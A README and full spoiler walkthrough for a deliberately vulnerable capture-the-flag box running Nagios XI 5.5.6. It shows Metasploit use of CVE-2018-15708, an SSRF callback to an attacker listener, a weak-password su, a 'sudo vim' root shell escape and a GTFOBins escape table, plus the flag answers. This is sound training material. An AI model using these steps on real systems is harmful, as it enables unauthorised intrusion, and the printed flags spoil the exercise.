A beginner-friendly CTF box featuring a vulnerable Nagios XI instance, weak credentials, and a classic sudo misconfiguration for privilege escalation.
| Detail | Value |
|---|---|
| Difficulty | Easy |
| Points | 20 |
| OS | Ubuntu 20.04 LTS |
| Flags | 2 (local.txt + proof.txt) |
| Author | 0xmmn |
- Network enumeration and service discovery
- Web application vulnerability identification
- Exploiting known CVEs (Nagios XI)
- Linux privilege escalation via sudo misconfigurations
Vagrant (recommended) provisions a fully configured VirtualBox VM with one command.

Prerequisites: VirtualBox + Vagrant

```bash
git clone https://github.com/momenbasel/naggets.git
cd naggets
vagrant up
```

The box takes 5-10 minutes to provision. When done, it prints the access info:

```
HTTP: http://localhost:8888 (or the DHCP-assigned private IP)
SSH:  vagrant ssh
```

To find the private IP for scanning:

```bash
vagrant ssh -c "hostname -I"
```

Without Vagrant, run the build script on any fresh Ubuntu 20.04 installation (VM, cloud instance, WSL2):
```bash
git clone https://github.com/momenbasel/naggets.git
cd naggets
sudo bash provision/build.sh
```

If someone shared a pre-built .ova file with you:

```bash
VBoxManage import naggets-ctf.ova
```

To build and export an OVA yourself (after vagrant up):

```bash
chmod +x provision/export-ova.sh
./provision/export-ova.sh
```

| Port | Service | Purpose |
|---|---|---|
| 22 | SSH | Remote access |
| 80 | HTTP | Nagios XI web interface |
Outbound traffic from the box is restricted by iptables: only DNS (53), HTTP (80), SSH (22) and ICMP are allowed out, so any reverse-shell listener or payload server you need the box to reach must sit on one of those ports. IPv6 is disabled.
- Treat this as a black-box engagement - enumerate everything
- Two flags to find:
  - local.txt - proves you got a user shell
  - proof.txt - proves you got root
- Submit the flag contents (MD5 hashes) as proof
- The intended path does not require brute-forcing the root password
Work through these one at a time. Only open the next hint if you are stuck.
Hint 1 - Enumeration
Run a full port scan and identify what is running on port 80. The web application version matters.
```bash
nmap -sC -sV -p- <target-ip>
```

Hint 2 - Web Application
The web application is Nagios XI. What version is it? Search for known CVEs affecting that specific version. There is at least one that gives you remote code execution without authentication.
Hint 3 - Initial Access
Look up CVE-2018-15708 and CVE-2018-15710. Metasploit's exploit/linux/http/nagios_xi_magpie_debug module covers this chain. There is also a standalone Python exploit available on GitHub - search for "nagios xi 5.5.6 rce".
Hint 4 - Lateral Movement
Once you have a shell as www-data or nagios, look at what users exist on the system. One of them has a very weak password - the username IS the password. Try su to switch to that user.
Hint 5 - Privilege Escalation
Check what the user can run with sudo -l. If a text editor can be run as root, it can spawn a root shell. Check GTFOBins.
SPOILER WARNING - Full solution below. Try the hints first.
Discover the target and scan for open services:
```bash
nmap -sC -sV -p- <target-ip>
```

Results:

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu
80/tcp open  http    Apache httpd 2.4.41
```

Browse to http://<target-ip>/ - you will be redirected to the Nagios XI login page at /nagiosxi/login.php. The footer reveals the version: Nagios XI 5.5.6.

Run directory enumeration to find additional paths:

```bash
gobuster dir -u http://<target-ip>/nagiosxi/ -w /usr/share/wordlists/dirb/common.txt
```

Notable finds:

- /nagiosxi/login.php - login form
- /nagiosxi/includes/ - directory listing in some cases
- /nagiosxi/api/ - REST API endpoint
Nagios XI 5.5.6 is vulnerable to multiple CVEs:

- CVE-2018-15708 - unauthenticated SSRF in magpie_debug.php, the entry point of the public remote-code-execution chain
- CVE-2018-15710 - local privilege escalation to root within Nagios XI
Option A: Metasploit

```bash
msfconsole -q
use exploit/linux/http/nagios_xi_magpie_debug
set RHOSTS <target-ip>
set LHOST <your-ip>
run
```

This gives you a shell as the nagios or www-data user. Keep the box's egress filter in mind: only outbound 22, 53, 80 and ICMP are allowed, so set LPORT (and any port the module serves files on) to one the box can actually reach, or the session never comes back.
Option B: Manual exploitation

The vulnerable endpoint is /nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php. It is reachable without authentication and fetches whatever URL is passed in the url parameter server-side (CVE-2018-15708, an SSRF). It does not include or execute the fetched content, so pointing url at a shell.php on your host is not by itself code execution; the public exploits chain this SSRF with the other 5.5.6 bugs to reach a shell. Confirm the endpoint is present first:

```bash
# Check if the endpoint exists
curl -s "http://<target-ip>/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php"
```

Before firing any exploit, set up your listener on a port the box may connect out to (22, 53 or 80; a listener on 4444 never gets a callback here) and use the SSRF to confirm the path back to you works:

```bash
# Terminal 1 - listener (binding 80 needs root)
sudo nc -lvnp 80

# Terminal 2 - make the box fetch a URL from you; a hit on the listener confirms both the SSRF and the egress path
curl "http://<target-ip>/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php?url=http://<your-ip>/"
```

Option C: Public exploit scripts
Search GitHub for nagios-xi-5.5.6-exploit - several standalone Python scripts exist.
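The egress filter described in the setup notes decides whether any of the callbacks above ever arrive, so once you have a first shell (or while probing the SSRF) confirm it from the box with `iptables -S OUTPUT` instead of guessing. The following is an added example, not code from the naggets repo: it parses that rule listing and picks the first candidate port a fresh outbound TCP connection would be allowed on. The sample rules are constructed to match the README's description of the filter, not captured from the VM, and only `--dport`/`--dports` matches are understood.

```python
"""Confirm which callback ports the box can reach before choosing a listener.

Added example, not part of the naggets repo. It parses the rule listing from
`iptables -S OUTPUT` (run on the foothold) and reports whether a new outbound
TCP connection to a given port would be accepted. Only --dport/--dports
matches are understood; loopback-only and conntrack-state rules are ignored
because they say nothing about fresh connections to your host.
"""
import re

# Constructed sample matching the README's description of the egress filter
# (DNS, HTTP, SSH and ICMP out, default DROP). Not captured from the VM.
SAMPLE_OUTPUT_RULES = """\
-P OUTPUT DROP
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A OUTPUT -p udp -m udp --dport 53 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 53 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A OUTPUT -p icmp -j ACCEPT
"""

RULE_RE = re.compile(r"^-A OUTPUT\b(?P<body>.*?)\s-j\s+(?P<target>\S+)\s*$")


def _ports(spec):
    """Expand a --dport/--dports spec such as "80", "53,80" or "1000:1010"."""
    ports = set()
    for part in spec.split(","):
        if ":" in part:
            lo, hi = part.split(":")
            ports.update(range(int(lo), int(hi) + 1))
        else:
            ports.add(int(part))
    return frozenset(ports)


def parse_output_chain(text):
    """Return (policy, accepts): the chain policy and a list of (proto, ports)
    pairs for ACCEPT rules that can match a new connection to a remote host.
    proto is "tcp", "udp", "icmp" or "any"; ports is a frozenset or None."""
    policy = "ACCEPT"          # iptables default if no -P line is seen
    accepts = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("-P OUTPUT"):
            policy = line.split()[-1]
            continue
        m = RULE_RE.match(line)
        if not m or m.group("target") != "ACCEPT":
            continue
        body = m.group("body")
        # Loopback-only and state-match rules do not permit new connections out.
        if " -o lo" in f" {body}" or "--ctstate" in body or "--state" in body:
            continue
        proto = re.search(r"-p\s+(\S+)", body)
        dport = re.search(r"--dports?\s+([\d,:]+)", body)
        accepts.append((proto.group(1) if proto else "any",
                        _ports(dport.group(1)) if dport else None))
    return policy, accepts


def tcp_egress_allowed(text, port):
    """True if a fresh outbound TCP connection to `port` would be accepted."""
    policy, accepts = parse_output_chain(text)
    for proto, ports in accepts:
        if proto in ("tcp", "any") and (ports is None or port in ports):
            return True
    return policy == "ACCEPT"


def pick_callback_port(text, candidates=(4444, 443, 80, 22, 53)):
    """First candidate the box may connect out to, or None if all are blocked."""
    for port in candidates:
        if tcp_egress_allowed(text, port):
            return port
    return None


if __name__ == "__main__":
    policy, accepts = parse_output_chain(SAMPLE_OUTPUT_RULES)
    print("policy:", policy)
    for proto, ports in accepts:
        print(f"  ACCEPT {proto} {sorted(ports) if ports else 'any port'}")
    print("use callback port:", pick_callback_port(SAMPLE_OUTPUT_RULES))
```

On the real box, feed it `iptables -S OUTPUT` (needs root, so run it after escalation, or read `/etc/iptables/rules.v4` if it is world-readable); with the filter as described the only usable TCP callbacks are 80, 22 and 53.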
Once you catch a reverse shell, stabilize it:
```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z to background
stty raw -echo; fg
export TERM=xterm
```

Check what users exist:
```bash
grep -vE 'nologin|false' /etc/passwd
```

Output shows the users with a login shell: root, cookies, rasta.
Try switching to cookies with the obvious password:
```bash
su cookies
# Password: cookies
```

You are now cookies. Grab the first flag:

```bash
cat ~/local.txt
```

```
eb0d623fa3ebf4ab0c39a9495198eaca
```
Check what cookies can do with sudo:
```bash
sudo -l
```

```
User cookies may run the following commands on nuggets:
    (root) NOPASSWD: /usr/bin/vim
```

The user can run vim as root without a password. This is a textbook GTFOBins escape: vim's :! runs an arbitrary shell command, and under sudo that shell inherits root.

```bash
sudo vim -c ':!/bin/bash'
```

You now have a root shell. Grab the final flag:

```bash
cat /root/proof.txt
```

```
f411d87894b17b94b2df0c612fc978d9
```
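Hint 5 and the escalation step above both come down to reading `sudo -l` output for a binary that can spawn a shell as root. The following is an added example, not code from the naggets repo: it parses the command rules in `sudo -l` output and flags the ones whose binary has a GTFOBins-style shell escape. The sample output and the SHELL_ESCAPES table are constructed for the example (the table is a small subset of what GTFOBins documents, not a statement about what the box installs).

```python
"""Flag sudo rules that let a user spawn a root shell (Hint 5 / privesc step).

Added example, not part of the naggets repo. It parses the command rules in
`sudo -l` output (or sudoers-style "(runas) TAGS: /path args" lines) and
flags binaries whose documented GTFOBins escape yields a shell. SHELL_ESCAPES
is a small hand-picked subset and an assumption of this example, not a
description of what the box installs.
"""
import os
import re

# Binary name -> one GTFOBins-documented way to get a shell via sudo.
SHELL_ESCAPES = {
    "vim": "sudo vim -c ':!/bin/bash'",
    "vi": "sudo vi -c ':!/bin/bash'",
    "less": "sudo less /etc/profile   (then type !/bin/bash)",
    "more": "sudo more /etc/profile   (then type !/bin/bash)",
    "find": "sudo find . -exec /bin/bash \\; -quit",
    "awk": "sudo awk 'BEGIN {system(\"/bin/bash\")}'",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/bash\")'",
    "perl": "sudo perl -e 'exec \"/bin/bash\";'",
    "env": "sudo env /bin/bash",
    "bash": "sudo bash",
    "sh": "sudo sh",
}

# Constructed sample shaped like the walkthrough's `sudo -l` output, with two
# extra rules added to show a harmless rule and an "(ALL : ALL)" runas.
SAMPLE_SUDO_L = """\
Matching Defaults entries for cookies on nuggets:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/bin\\:/bin

User cookies may run the following commands on nuggets:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl status apache2
    (ALL : ALL) NOPASSWD: /usr/bin/find, /usr/bin/id
"""

RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return one dict per command: {"runas", "nopasswd", "command"}."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run" in line:
            in_rules = True          # everything after this header is a rule
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # "(root)" or "(ALL : ALL)"
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": runas, "nopasswd": nopasswd, "command": cmd.strip()})
    return rules


def risky_rules(text):
    """Rules that run a shell-escapable binary (or ALL) as root, with the escape.

    Fixed arguments do not defuse editors and pagers: `vim /etc/hosts` still
    honours :! so the match is on the binary name alone."""
    findings = []
    for rule in parse_sudo_l(text):
        if rule["runas"] not in ("root", "ALL"):
            continue
        if rule["command"] == "ALL":
            escape = "sudo -i"
        else:
            binary = os.path.basename(rule["command"].split()[0])
            if binary not in SHELL_ESCAPES:
                continue
            escape = SHELL_ESCAPES[binary]
        findings.append({**rule, "escape": escape})
    return findings


if __name__ == "__main__":
    for f in risky_rules(SAMPLE_SUDO_L):
        tag = "NOPASSWD" if f["nopasswd"] else "password required"
        print(f"{f['command']:<40} ({f['runas']}, {tag}) -> {f['escape']}")
```

Run it as `sudo -l | python3 sudo_audit.py` style input on the foothold, or point it at a sudoers file; rules that need a password are still reported, since on this box the password is already known.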
```
Enumeration (nmap)
        |
        v
Nagios XI 5.5.6 identified
        |
        v
CVE-2018-15708 (magpie_debug.php SSRF -> RCE chain)
        |
        v
Shell as www-data/nagios
        |
        v
su cookies (password = "cookies")
        |
        v
local.txt --> eb0d623fa3ebf4ab0c39a9495198eaca
        |
        v
sudo vim -c ':!/bin/bash' (GTFOBins)
        |
        v
proof.txt --> f411d87894b17b94b2df0c612fc978d9
```
| Flag | Hash | Location |
|---|---|---|
| local.txt | eb0d623fa3ebf4ab0c39a9495198eaca | /home/cookies/local.txt |
| proof.txt | f411d87894b17b94b2df0c612fc978d9 | /root/proof.txt |
```bash
# Destroy the VM
vagrant destroy -f
# Or just stop it
vagrant halt
```

All challenge parameters are defined as variables at the top of provision/build.sh:

| Variable | Default | Description |
|---|---|---|
| NAGIOS_VERSION | 5.5.6 | Nagios XI version to install |
| USER_MAIN | cookies | Exploitable user account |
| USER_MAIN_PASS | cookies | Weak password for that user |
| FLAG_LOCAL | eb0d62... | local.txt flag hash |
| FLAG_ROOT | f411d8... | proof.txt flag hash |
Change the flags before distributing so players can't just read this README for the answer.
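One way to do that rotation without hand-editing the script is shown below. This is an added example, not code from the naggets repo: it assumes the flags are plain shell assignments near the top of provision/build.sh (FLAG_LOCAL="<hex>", quoted or not), replaces each with 128 fresh random bits in the same 32-hex shape as the shipped flags, and refuses to write a half-rotated script if a variable is missing. SAMPLE_BUILD_SH is constructed from the README's variable table, not copied from the real build.sh.

```python
"""Rotate FLAG_LOCAL / FLAG_ROOT in provision/build.sh before handing out the box.

Added example, not part of the naggets repo. It assumes the flags are plain
shell assignments at the top of build.sh (FLAG_LOCAL="<32 hex>" or unquoted);
SAMPLE_BUILD_SH is constructed from the README's variable table, not copied
from the real script. New values are 128 random bits rendered as 32 hex
characters, the same shape as the MD5-style flags the box ships with.
"""
import re
import secrets

FLAG_VARS = ("FLAG_LOCAL", "FLAG_ROOT")
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed stand-in for the top of provision/build.sh.
SAMPLE_BUILD_SH = """\
#!/bin/bash
NAGIOS_VERSION="5.5.6"
USER_MAIN="cookies"
USER_MAIN_PASS="cookies"
FLAG_LOCAL="eb0d623fa3ebf4ab0c39a9495198eaca"
FLAG_ROOT="f411d87894b17b94b2df0c612fc978d9"
"""


def new_flag():
    """A fresh flag: 32 lowercase hex characters from a CSPRNG."""
    return secrets.token_hex(16)


def read_flags(script):
    """Current FLAG_* values as {name: value}; quotes around the value are optional."""
    found = {}
    for name in FLAG_VARS:
        m = re.search(rf"^{name}=[\"']?([0-9a-fA-F]+)[\"']?\s*$", script, re.M)
        if m:
            found[name] = m.group(1)
    return found


def rotate_flags(script, new_values=None):
    """Return (new_script, {name: value}). Values not given are generated.

    Raises ValueError if a value is malformed or a flag variable is missing or
    assigned more than once, so a half-rotated script is never written out."""
    values = dict(new_values or {})
    for name in FLAG_VARS:
        value = values.setdefault(name, new_flag())
        if not HEX32.match(value):
            raise ValueError(f"{name}: flag must be 32 lowercase hex chars")
        script, n = re.subn(rf"^{name}=.*$", f'{name}="{value}"', script, flags=re.M)
        if n != 1:
            raise ValueError(f"expected exactly one {name} assignment, found {n}")
    return script, values


def flags_rotated(old_script, new_script):
    """True only if every flag is present in both scripts and every value changed."""
    old, new = read_flags(old_script), read_flags(new_script)
    return (set(old) == set(new) == set(FLAG_VARS)
            and all(old[k] != new[k] for k in FLAG_VARS))


if __name__ == "__main__":
    # Real use: read provision/build.sh, rotate, write it back, and record the
    # new values out of band (they are what players will submit).
    rotated, values = rotate_flags(SAMPLE_BUILD_SH)
    assert flags_rotated(SAMPLE_BUILD_SH, rotated)
    print(rotated)
    print(values)
```

Run it before `vagrant up` (or before the manual build), since the flags are baked into the VM at provisioning time; rotating the README's walkthrough hashes afterwards is also worth doing, or the spoiler section gives the answer away.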
```
naggets/
  Vagrantfile              # VM definition and provisioning config
  provision/
    build.sh               # Main build script (runs as root)
    export-ova.sh          # Export VM as distributable OVA
    files/
      motd                 # Login banner
      setup_nagios.py      # Nagios XI setup wizard automation
  LICENSE
  README.md
```
Nagios XI download fails
The tarball URL may go offline. Download xi-5.5.6.tar.gz manually from Nagios Assets and place it in the project root as nagiosxi-5.5.6.tar.gz; Vagrant syncs the project root to /vagrant/ inside the VM, and the build script checks there for a local copy as a fallback.
VM hangs during provisioning
Nagios XI fullinstall takes 3-5 minutes and installs MySQL, SNMP, and various dependencies. If it appears stuck, wait. If it fails, SSH in with vagrant ssh and check /tmp/nagiosxi/ logs.
Port 8888 not responding
Ensure VirtualBox port forwarding is working. Alternatively, use the private network IP:
```bash
vagrant ssh -c "hostname -I"
curl http://<private-ip>/nagiosxi/
```

- Original concept: 0xmmn (2020)
- Nagios XI: Nagios Enterprises
- Privesc technique: GTFOBins
MIT - See LICENSE for details.